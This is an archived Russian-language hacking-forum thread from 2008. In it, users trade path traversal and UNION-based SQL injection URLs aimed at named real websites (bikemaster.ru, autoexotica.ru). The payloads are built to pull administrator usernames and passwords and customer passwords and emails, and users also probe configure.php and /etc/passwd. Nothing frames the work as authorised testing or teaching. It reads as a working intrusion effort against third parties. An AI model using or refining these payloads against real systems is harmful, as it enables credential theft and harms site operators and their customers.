ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
19.07.2008, 00:08
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Жесть =) Совсем мозг пропил пивом =) Спасибо=) Кажется спать иногда полезно =)
|
|
|
19.07.2008, 05:33
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Есть сайт:
Код:
http://www.bikemaster.ru/admin/htmlarea/popups/lister.php?DPI=96&action=view&path=&file=..
Позволяет смотреть директории изображений.
SQL иньекцию прикрыли наглухо. И самое интересное - на следующий день после ее обнаружения (када спать уже пошел и сил небыло ничего делать.) Перебрасывает на главную страницу при любой попытке запроса.
Файл конфигурации includes/configure.php просто так не просмотреть.
Пробовал так:
Код:
http://www.bikemaster.ru/admin/htmlarea/popups/lister.php?DPI=96&path=../../../../includes/configure.php
, но сам файл никак не посмотреть.
Кто-нибудь может что-нибудь подсказать? |
|
|
|
19.07.2008, 06:21
|
|
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
Провел на форуме:
6128108
Репутация:
445
|
|
Вроде нельзя по провам юзера просматривать их, если я ниче не путаю
|
|
|
|
19.07.2008, 10:49
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
SQL иньекцию прикрыли наглухо.
http://www.bikemaster.ru/popup_image1.php?pID=-1'
|
|
|
|
19.07.2008, 10:53
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Сообщение от BlackSun
http://www.bikemaster.ru/popup_image1.php?pID=-1'
+) Я чет файл popup_image1.php даже вблизи не видел на сайте 
|
|
|
|
19.07.2008, 11:10
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Оно просто не отображает или иньекция слепая?
Код:
http://bikemaster.ru/popup_image1.php?pID=-1'union+select+1,concat(user_name,0x3a,user_password),3,4,5+from+administrators--
или:
Код:
http://bikemaster.ru/popup_image1.php?pID=-1+union+select+1.2.concat(customers_lastname.0x3a.customers_password.0x3a.customers_email_address).4.5.6.7.8+from+customers--
|
|
|
|
19.07.2008, 11:12
|
|
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345
Репутация:
4589
|
|
А вот это хз, не раскручивал)
|
|
|
|
19.07.2008, 11:46
|
|
Участник форума
Регистрация: 17.06.2008
Сообщений: 214
Провел на форуме:
964766
Репутация:
228
|
|
Иньекция кажется слепая. А вот это что такое:
Код:
http://www.bikemaster.ru/etc/passwd
Раз не пишет, что не найдена страница, значит оно есть Но что ето?
Кажется сайт неплохо защитили. |
|
|
|
19.07.2008, 14:43
|
|
Новичок
Регистрация: 22.05.2008
Сообщений: 27
Провел на форуме:
80944
Репутация:
0
|
|
Сообщение от USAkid
Оно просто не отображает или иньекция слепая?
Код:
http://bikemaster.ru/popup_image1.php?pID=-1'union+select+1,concat(user_name,0x3a,user_password),3,4,5+from+administrators--
или:
Код:
http://bikemaster.ru/popup_image1.php?pID=-1+union+select+1.2.concat(customers_lastname.0x3a.customers_password.0x3a.customers_email_address).4.5.6.7.8+from+customers--
Нет всё там нормально!
http://bikemaster.ru/popup_image1.php?pID=-1'+union+select+1,unhex(hex(concat_ws(user_name,0x 3a,user_password))),3,4,5+from+0x61646d696e6973747 261746f7273/*
Последний раз редактировалось 2la.painkiller; 19.07.2008 в 14:46..
|
|
|
|
19.07.2008, 15:22
|
|
Новичок
Регистрация: 22.05.2008
Сообщений: 27
Провел на форуме:
80944
Репутация:
0
|
|
Хелп не могу сделать запрос
http://www.autoexotica.ru/news/?nid=128' дыра
http://www.autoexotica.ru/news/?nid=128+order+by+11/* колонок
http://www.autoexotica.ru/news/?nid=128+union+select+1,2,3,4,5,6,7,8,9,10,11/*
Пишет ошибку как так?
You have an error in your SQL syntax near 'union select 1,2,3,4,5,6,7,8,9,10,11/*' at line 1
SELECT *, DATE_FORMAT(date, "%d.%m.%y") AS frm_date FROM news_data WHERE news_id=128 union select 1,2,3,4,5,6,7,8,9,10,11/*
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
